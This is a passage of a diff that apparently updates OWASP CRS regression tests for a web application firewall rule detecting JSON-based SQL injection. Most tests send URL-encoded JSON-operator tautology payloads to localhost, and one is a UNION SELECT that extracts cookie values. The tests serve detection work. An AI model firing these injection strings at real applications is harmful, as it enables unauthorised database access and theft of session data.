"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 